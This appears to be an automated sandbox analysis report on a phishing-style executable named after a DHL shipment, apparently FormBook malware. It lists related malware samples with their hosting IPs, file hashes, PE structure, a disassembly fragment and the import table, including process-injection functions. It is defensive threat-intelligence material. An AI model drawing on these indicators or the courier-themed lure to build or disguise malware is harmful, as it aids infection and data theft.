                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | nshsh4.elf | Get hash | malicious | Mirai | Browse
                                                                                  • 156.251.3.5
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | i586.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                                                                  • 156.251.7.145
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | armv4l.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                                                                  • 156.244.234.130
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | ex86.elf | Get hash | malicious | Mirai | Browse
                                                                                  • 156.244.234.110
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | armv6l.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                                                                  • 156.242.206.57
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | mipsel.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                                                                  • 156.251.7.126
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | ek8LkB2Cgo.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 156.251.17.224
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | PO 4110007694.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 156.251.17.224
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | m68k.elf | Get hash | malicious | Mirai | Browse
                                                                                  • 156.242.206.20
                                                                                  REGISTER-ASIT | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | SRT68.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                                                  • 195.110.124.133
                                                                                  REGISTER-ASIT | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 195.110.124.133
                                                                                  SEDO-ASDE | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | RvJVMsNLJI.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  SEDO-ASDE | Certificate 64411-18.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 91.195.240.94
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.994602609396068
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:Fgw2Nz7AgbK8JRhWnBYH2/HH3PUn5FC393y6+m9cB:FgZzEgbNLk6H2PPc4Smq
                                                                                  MD5:8C8B3EACBFE6407219C6439CB689162D
                                                                                  SHA1:FAB193DAD466AB9B3B9D38D266745E36A254AFAB
                                                                                  SHA-256:72959DD2D29F1AFCC66783159E5E6B3F44A2CBFEDC6757C5F7B5AF24ADF4DA45
                                                                                  SHA-512:0F9F20A2BC5BBC31DA2C0D5E2DD72A88988F2F02E34904EA2187E8FEE557D1EF12B511155E3EFA2CBCA038AC5A2D66DFF1541035A13C984A91F32181F39A2EAA
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.m.d.YZKO...H......Z4...qYC...XAT17Q02Z7E68YZKOM0XAT17Q02Z7E.8YZEP.>X.]...1~...^Q*z;="W* 9.T0^\5CeT]y(>!mY6a.~dq Rk;5S~KOM0XATH6X..:P..X>.v/*.B....1W.@....9=.U.}4V..YQ2.%Q.YZKOM0XA.t7Q|3[7.^..ZKOM0XAT.7S19[<E6(]ZKOM0XAT1.D02Z'E68y^KOMpXAD17Q22Z1E68YZKOK0XAT17Q0.^7E48YZKOM2X..17A02J7E68IZK_M0XAT1'Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT.C4HFZ7E.7]ZK_M0XQP17A02Z7E68YZKOM0XaT1WQ02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0X
                                                                                  Process:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.994602609396068
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:Fgw2Nz7AgbK8JRhWnBYH2/HH3PUn5FC393y6+m9cB:FgZzEgbNLk6H2PPc4Smq
                                                                                  MD5:8C8B3EACBFE6407219C6439CB689162D
                                                                                  SHA1:FAB193DAD466AB9B3B9D38D266745E36A254AFAB
                                                                                  SHA-256:72959DD2D29F1AFCC66783159E5E6B3F44A2CBFEDC6757C5F7B5AF24ADF4DA45
                                                                                  SHA-512:0F9F20A2BC5BBC31DA2C0D5E2DD72A88988F2F02E34904EA2187E8FEE557D1EF12B511155E3EFA2CBCA038AC5A2D66DFF1541035A13C984A91F32181F39A2EAA
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.m.d.YZKO...H......Z4...qYC...XAT17Q02Z7E68YZKOM0XAT17Q02Z7E.8YZEP.>X.]...1~...^Q*z;="W* 9.T0^\5CeT]y(>!mY6a.~dq Rk;5S~KOM0XATH6X..:P..X>.v/*.B....1W.@....9=.U.}4V..YQ2.%Q.YZKOM0XA.t7Q|3[7.^..ZKOM0XAT.7S19[<E6(]ZKOM0XAT1.D02Z'E68y^KOMpXAD17Q22Z1E68YZKOK0XAT17Q0.^7E48YZKOM2X..17A02J7E68IZK_M0XAT1'Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT.C4HFZ7E.7]ZK_M0XQP17A02Z7E68YZKOM0XaT1WQ02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0X
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.184351810536893
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:DHL 40312052024.exe
                                                                                  File size:1'202'688 bytes
                                                                                  MD5:76d2944f234154fa8d4c251ec4c621be
                                                                                  SHA1:47879dc1ba25220085eddb2f8aa0b29369909bef
                                                                                  SHA256:c45d7adb88147a71f85263d1e1f3394cb3edb67b2659986a1c6785326d4357b0
                                                                                  SHA512:24f07adf4647e2f61a98de3d38c0a8898cd6fe415fb94e51d8e6021ca3ae9bbf5f6568089cde9b513539d16326a2c52e5ade13ddc73e937a5a3dd15aa48f231e
                                                                                  SSDEEP:24576:4u6J33O0c+JY5UZ+XC0kGso6FafWwXgV+pPCSxCKUzWY:yu0c++OCvkGs9FafpXgOPCSxCwY
                                                                                  TLSH:5045CF2273DDC360CB669173BF69B7016EBF7C210A30B95B2F980D7DA950162162D7A3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                  Entrypoint:0x427dcd
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6752F2D3 [Fri Dec 6 12:49:23 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                  Instruction
                                                                                  call 00007FD394BAAF8Ah
                                                                                  jmp 00007FD394B9DD54h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FD394B9DEDAh
                                                                                  cmp edi, eax
                                                                                  jc 00007FD394B9E23Eh
                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                  jnc 00007FD394B9DED9h
                                                                                  rep movsb
                                                                                  jmp 00007FD394B9E1ECh
                                                                                  cmp ecx, 00000080h
jc 00007FD394B9E0A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FD394B9DEE0h
bt dword ptr [004BE324h], 01h
jc 00007FD394B9E3B0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FD394B9E07Dh
test edi, 00000003h
jne 00007FD394B9E08Eh
test esi, 00000003h
jne 00007FD394B9E06Dh
bt edi, 02h
jnc 00007FD394B9DEDFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FD394B9DEE3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FD394B9DF35h
bt esi, 03h
jnc 00007FD394B9DF88h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5d054 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5d054 | 0x5d200 | a2416438971472fbd621088e629790fc | False | 0.9289848993288591 | data | 7.897657104855963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x54319 | data | | | 1.0003363713075275
RT_GROUP_ICON | 0x123ad4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123b4c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x123b60 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x123b74 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x123b88 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123c64 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
